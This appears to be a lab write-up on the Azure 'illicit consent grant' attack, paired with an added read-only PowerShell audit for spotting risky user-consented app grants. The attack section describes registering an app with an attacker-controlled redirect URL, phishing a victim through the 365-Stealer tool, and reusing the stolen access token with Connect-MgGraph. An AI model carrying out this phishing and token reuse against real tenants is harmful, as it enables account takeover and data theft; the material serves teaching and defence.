Illicit Consent Grant

When we have initial access to a user, we can register an application (by default, any user in the tenant is allowed to do this).

A recommendation is to prevent users from registering applications.

With this application we can ask another user to consent to the permissions our application requests. When the user consents, we receive their access token, which we can then use to interact with, for example, the Microsoft Graph API.
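The two things a defender wants to know after reading this are whether the tenant still allows ordinary users to register applications and consent to them, and which delegated grants users have already given. The script below is an added example, not code from the original page or from 365-Stealer: a read-only audit with the Microsoft Graph PowerShell SDK (the same module the walkthrough uses) that reports both settings and lists user-consented grants, flagging apps that are owned by another tenant or whose reply URLs are not on an allowlist. It assumes the Microsoft.Graph module is installed, that the account running it holds Policy.Read.All and Directory.Read.All, and that the hostnames in $trustedHosts are a constructed allowlist for your own tenant.

```powershell
# Added example (not from the original page or from 365-Stealer): a read-only
# audit, run by a tenant administrator, of the settings that make an illicit
# consent grant possible and of the delegated grants users have already given.
# Assumptions: Microsoft.Graph SDK installed; the signed-in account has
# Policy.Read.All and Directory.Read.All; $trustedHosts is a constructed
# allowlist of this tenant's own redirect URI hosts.

Connect-MgGraph -Scopes 'Policy.Read.All', 'Directory.Read.All' -NoWelcome

$tenantId     = (Get-MgContext).TenantId
$trustedHosts = @('login.contoso.example', 'app.contoso.example')   # constructed

# 1. Tenant-wide settings: may ordinary users register apps, and may they
#    consent to apps on their own? Both are permitted by default.
$policy              = Get-MgPolicyAuthorizationPolicy
$canCreateApps       = $policy.DefaultUserRolePermissions.AllowedToCreateApps
$userConsentPolicies = @($policy.PermissionGrantPolicyIdsAssignedToDefaultUserRole)

[pscustomobject]@{
    UsersCanRegisterApps    = $canCreateApps
    UserConsentPolicyIds    = ($userConsentPolicies -join ', ')
    UserConsentFullyBlocked = ($userConsentPolicies.Count -eq 0)
} | Format-List

# 2. Delegated permission grants. ConsentType 'Principal' means one user
#    consented for themselves (what a successful phish produces);
#    'AllPrincipals' means an admin consented on behalf of everyone.
$grants   = Get-MgOauth2PermissionGrant -All
$findings = foreach ($g in $grants) {
    $sp = Get-MgServicePrincipal -ServicePrincipalId $g.ClientId

    # Reduce each reply URL to its host so it can be compared with the allowlist.
    $replyHosts = foreach ($u in $sp.ReplyUrls) {
        try { ([uri]$u).Host } catch { $u }
    }

    # An app registered in another tenant carries that tenant's id here.
    $foreignApp   = ($null -ne $sp.AppOwnerOrganizationId) -and
                    ("$($sp.AppOwnerOrganizationId)" -ne "$tenantId")
    $unknownReply = @($replyHosts | Where-Object { $_ -notin $trustedHosts }).Count -gt 0

    [pscustomobject]@{
        App          = $sp.DisplayName
        AppId        = $sp.AppId
        ConsentType  = $g.ConsentType
        PrincipalId  = $g.PrincipalId          # empty for AllPrincipals grants
        Scope        = $g.Scope
        ForeignApp   = $foreignApp
        UnknownReply = $unknownReply
        ReplyHosts   = ($replyHosts -join ', ')
    }
}

# Triage order: user-consented grants to foreign apps or apps with reply URLs
# that are not ours. Review the Scope column for anything beyond openid,
# profile and User.Read.
$findings |
    Where-Object { $_.ConsentType -eq 'Principal' -and ($_.ForeignApp -or $_.UnknownReply) } |
    Sort-Object App |
    Format-Table App, ConsentType, Scope, ForeignApp, UnknownReply, ReplyHosts -AutoSize
```

A grant found this way is revoked by deleting the oauth2PermissionGrant object (and, if the app is not wanted at all, its service principal). The settings in step 1 map to "Users can register applications" and the user consent settings in the Entra admin center; turning the first off and restricting the second to verified publishers with low-impact permissions, or routing everything through the admin consent workflow, closes the path this page describes.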

Illicit Consent Grant attack explained

Attack

We first go to https://portal.azure.com and register an application from our initial access user. We should use a URL that we own as the redirect URL, for example https://172.16.10.10/login/authorized. For the permissions, we add User.ReadBasic.All:

Next, we spin up 365-Stealer, a tool created by Altered Security that provides a GUI for managing the phishing attack: https://github.com/AlteredSecurity/365-Stealer. This tool allows us to fill in the app's information:

If we save and run the attack, a shell pops up with a phishing link:

We send this link to the victim. If the victim consents to our application, we receive an update in the GUI:

We can copy the access_token and use it to connect to Microsoft Graph:

PS C:\Windows\system32> $token = 'eY.....'
PS C:\Windows\system32> Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)
Welcome to Microsoft Graph!

Connected via userprovidedaccesstoken access using bd46fc07-1626-43be-80b7-fkfkfkf
Readme: https://aka.ms/graph/sdk/powershell
SDK Docs: https://aka.ms/graph/sdk/powershell/docs
API Docs: https://aka.ms/graph/docs

NOTE: You can use the -NoWelcome parameter to suppress this message.

PS C:\Windows\system32> Get-MgContext


ClientId               : bd46fc07-1626-43be-80b7fgfgfgfgff
TenantId               : 2d50cb29-5f7b-48a4-87ceffgffgfgfg
Scopes                 : {User.Read, User.ReadBasic.All, profile, openid...}
AuthType               : UserProvidedAccessToken
TokenCredentialType    : UserProvidedAccessToken
CertificateThumbprint  :
CertificateSubjectName :
SendCertificateChain   : False
Account                : [email protected]
AppName                : student60
ContextScope           : Process
Certificate            :
PSHostVersion          : 5.1.17763.1490
ManagedIdentityId      :
ClientSecret           :
Environment            : Global
